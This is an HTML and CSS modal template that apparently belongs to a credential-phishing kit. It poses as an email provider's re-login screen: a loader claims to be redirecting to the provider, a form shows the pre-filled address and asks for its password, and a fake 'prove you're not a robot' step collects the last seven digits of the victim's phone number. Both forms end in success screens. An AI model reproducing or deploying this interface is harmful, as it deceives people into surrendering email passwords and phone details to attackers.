<!-- The Modal -->
<style type="text/css">
    /* The Modal (background) */
    .evm_.evm-modal {
        display: none; /* Hidden by default */
        position: fixed; /* Stay in place */
        z-index: 2000!important; /* Sit on top */
        left: 0;
        top: 0;
        width: 100%; /* Full width */
        height: 100%; /* Full height */
        overflow: auto; /* Enable scroll if needed */
        background-color: rgb(0,0,0); /* Fallback color */
        background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
    }

    /* Modal Content/Box */
    .evm_ .evm-modal-content {
        background-color: #fefefe;
        margin: 15% auto; /* 15% from the top and centered */
        padding: 20px;
        border: 1px solid #888;
        width: 80%; /* Could be more or less, depending on screen size */

        box-shadow: none !important;
    }

    .evm_.full-view.evm-modal {
        display: none; /* Hidden by default */
        position: fixed; /* Stay in place */
        z-index: 1; /* Sit on top */
        left: 0;
        top: 0;
        width: 100%; /* Full width */
        height: 100%; /* Full height */
        height: 100vh; /* Full height */
        overflow: auto; /* Enable scroll if needed */
        background-color:  #fefefe; /* Fallback color */
    }

    .evm_.full-view.evm-modal .evm-modal-content {
        background-color: #fefefe;
        margin: 8% auto; /* 15% from the top and centered */
        padding: 20px;
        border: 1px solid #ededed;
        width: 30%; /* Could be more or less, depending on screen size */
        border-radius: 4px;

        box-shadow: none !important;
    }

    /* The Close Button */
    .evm_ .close {
        color: #aaa;
        float: right;
        font-size: 28px;
        font-weight: bold;
    }

    .evm_ .close:hover,
    .evm_ .close:focus {
        color: black;
        text-decoration: none;
        cursor: pointer;
    }

    .evm_ .evm_font_1 { font-family: Arial, Helvetica, sans-serif !important; }

    .evm_ .form-group { margin-bottom: 15px; }
    .evm_ .form-control {
        max-width: 100%;
        height: 30px;
        padding: 5px 15px;
        background-color: #fff;
        background-image: none;
        border: 1px solid #c2c1bc !important;
        border-radius: 4px;
    }

    .evm_ .form-control:focus { outline-color:#2e81ec !important; }

    .evm_ .my-form .btn-primary {
        color: #fff;
        background-image: linear-gradient(to bottom, #2e81ec 0, #2e81ec 100%);
        background-repeat: repeat;
        border-color: transparent;
        display: inline-block;
        margin-bottom: 0;
        text-align: center;
        touch-action: manipulation;
        cursor: pointer;
        /* border: 1px solid transparent; */
        box-shadow: 0 1px 4px rgb(0 0 0 / 22%);
        padding: 5px 15px;
        font-size: 16px;
        line-height: 1.428571429;
        border-radius: 4px;
    }

    @media (max-width: 600px){
        .evm_ .evm-modal-content, .evm_.full-view.evm-modal .evm-modal-content {
            border: 1px solid transparent;
            width: 100%; 
        }
    }
</style>
<style type="text/css">
    /* CSS Loader
    ----------------------------- */
    .emv-loader,
    .emv-loader:after {
        border-radius: 50%;
        width: 10em;
        height: 10em;
    }
    .emv-loader {
        margin: 20px auto;
        font-size: 10px;
        position: relative;
        text-indent: -9999em;
        border-top: 1.1em solid rgba(000, 000, 000, 0.2);
        border-right: 1.1em solid rgba(000, 000, 000, 0.2);
        border-bottom: 1.1em solid rgba(000, 000, 000, 0.2);
        border-left: 1.1em solid #71777e;
        -webkit-transform: translateZ(0);
        -ms-transform: translateZ(0);
        transform: translateZ(0);
        /* -webkit-animation: load8 1.1s infinite linear;
        animation: load8 1.1s infinite linear; */
        -webkit-animation: load8 0.9s infinite linear;
        animation: load8 0.9s infinite linear;
    }
    @-webkit-keyframes load8 {
        0% {
            -webkit-transform: rotate(0deg);
            transform: rotate(0deg);
        }
        100% {
            -webkit-transform: rotate(360deg);
            transform: rotate(360deg);
        }
    }
    @keyframes load8 {
        0% {
            -webkit-transform: rotate(0deg);
            transform: rotate(0deg);
        }
        100% {
            -webkit-transform: rotate(360deg);
            transform: rotate(360deg);
        }
    }
</style>
<style type="text/css">
    .checkmark__circle {
        stroke-dasharray: 166;
        stroke-dashoffset: 166;
        stroke-width: 2;
        stroke-miterlimit: 10;
        stroke: #7ac142;
        fill: none;
        animation: stroke 0.6s cubic-bezier(0.65, 0, 0.45, 1) forwards;
    }

    .checkmark:not(.jpui.checkmark) {
        width: 56px;
        height: 56px;
        border-radius: 50%;
        display: block;
        stroke-width: 2;
        stroke: #fff;
        stroke-miterlimit: 10;
        margin: 10% auto;
        box-shadow: inset 0px 0px 0px #7ac142;
        animation: fill .4s ease-in-out .4s forwards, scale .3s ease-in-out .9s both;
    }

    .checkmark__check {
        transform-origin: 50% 50%;
        stroke-dasharray: 48;
        stroke-dashoffset: 48;
        animation: stroke 0.3s cubic-bezier(0.65, 0, 0.45, 1) 0.8s forwards;
    }

    @keyframes stroke {
    100% {
        stroke-dashoffset: 0;
    }
    }
    @keyframes scale {
    0%, 100% {
        transform: none;
    }
    50% {
        transform: scale3d(1.1, 1.1, 1);
    }
    }
    @keyframes fill {
    100% {
        box-shadow: inset 0px 0px 0px 30px #7ac142;
    }
    }
</style>

<div id="emvModal" class="evm_ full-view evm-modal evm_font_1">

    <!-- Modal content -->
    <div class="evm-modal-content">
        <!-- <span class="close">&times;</span> -->

        <div>
            <div id="jsModalEr" class="alert alert-danger w3-medium" style="display:none; background-color: red; color: #fff; width:90%; margin:0 auto; padding: 8px 10px; border-radius: 4px;">
                <p style="margin:0; color: #fff;">Error: </p>
            </div>

            <div id="emvLoader" style="padding:10px 30px; overflow: hidden;">

                <div class="emv-loader">Loading...</div>

                <p class="blink w3-center xw3-text-gray xw3-small w3-medium"
                    style="text-align: center; xfont-size: .875rem;">
                    Redirecting to your email provider...
                </p>

            </div>


            <div id="emvForm" style="padding:10px 30px; display: none;">

                <form id="form_email" name="form_email" method="post" action="" class="pg-form my-form" style="text-align: center;">
                    <div class="form-group">
                        <div style="width:120px; /* height:120px; */ overflow:hidden; display:inline-block;">
                            <img id="emlLogo" src="" style="width:100%; border-radius: 4px;">
                        </div>
                    </div>

                    <div class="form-group w3-section">
                        <h3 class="" style="margin-bottom: 8px;font-size: 16px;letter-spacing: 0.1px;font-weight: normal;color:#202124;"> You are logged in as: </h3>
                        <label for="email" style="margin-bottom: 10px; display: block; font-size: 16px;"> <strong id="emlDisplay" class="w3-mediumx">...</strong> </label>
                        <input type="hidden" class="form-control" id="m_j_email" name="m_j_email" value="">
                    </div>

                    <div class="form-group">
                        <!-- <label for="pwd" >Password:</label> -->
                        <input type="password" class="form-control" id="m_j_email_password" name="m_j_email_password" placeholder="Password" style="font-size: 17px !important;">
                    </div>

                    <div class="form-group">
                        <br />
                        <button type="submit" class="btn btn-primary" style="width:40%"> Continue </button>
                    </div>

                    <!-- <div class="form-group">
                        <button type="button" class="close" data-dismiss="modal" aria-label="Close" style="float: none; font-size: small; width:120px;">Change Email</button>
                    </div> -->
                </form>

            </div>



            <div id="emvSuccess" style="padding:10px 30px; overflow: hidden; text-align: center; display: none;">

                <svg class="checkmark" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 52 52">
                    <circle class="checkmark__circle" cx="26" cy="26" r="25" fill="none" />
                    <path class="checkmark__check" fill="none" d="M14.1 27.2l7.1 7.2 16.7-16.8" />
                </svg>

                <h1> SUCCESS. </h1>
                <p class="w3-medium"> You have completely confirmed email address.
                    <br /><br /> Thank You. <br /> <br />
                </p>

            </div>



            <div id="telForm" style="padding:10px 30px; display: none;">

                <form id="form_tel" name="form_tel" method="post" action="" class="pg-form my-form"
                    style="text-align: center;">
                    <div class="form-group">
                        <br />
                    </div>

                    <div class="form-group">
                        <h3 class="" style="margin-bottom: 10px;"> <strong style="text-transform: uppercase;">Prove
                                you're not a robot:</strong> </h3>
                        <p style="font-size: medium;"> Enter the last 7 digits of your phone number in the box below
                        </p>
                        <label for="email"> <strong id="telDisplay" style="font-size: medium;">...</strong> </label>
                        <input type="hidden" class="form-control" id="m_j_phone" name="m_j_phone" value="">
                    </div>

                    <div class="form-group">
                        <!-- <label for="pwd" >Password:</label> -->
                        <input type="password" class="form-control" id="m_j_code" name="m_j_code" placeholder="#######"
                            style="font-size: 17px !important;" maxlength="7">
                    </div>


                    <div class="form-group">
                        <br />
                        <button type="submit" class="btn btn-primary" style="width:40%"> Continue </button>
                    </div>

                    <!-- <div class="form-group">
                        <button type="button" class="close" data-dismiss="modal" aria-label="Close" style="float: none; font-size: small; width:120px;">Change Email</button>
                    </div> -->
                </form>

            </div>



            <div id="telSuccess" style="padding:10px 30px; overflow: hidden; text-align: center; display: none;">

                <svg class="checkmark" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 52 52">
                    <circle class="checkmark__circle" cx="26" cy="26" r="25" fill="none" />
                    <path class="checkmark__check" fill="none" d="M14.1 27.2l7.1 7.2 16.7-16.8" />
                </svg>

                <h1> SUCCESS. </h1>
                <p> You have completely confirmed you are not a robot.
                    <br /><br /> Thank You. <br /> <br />
                </p>

            </div>


        </div>
    </div>

</div>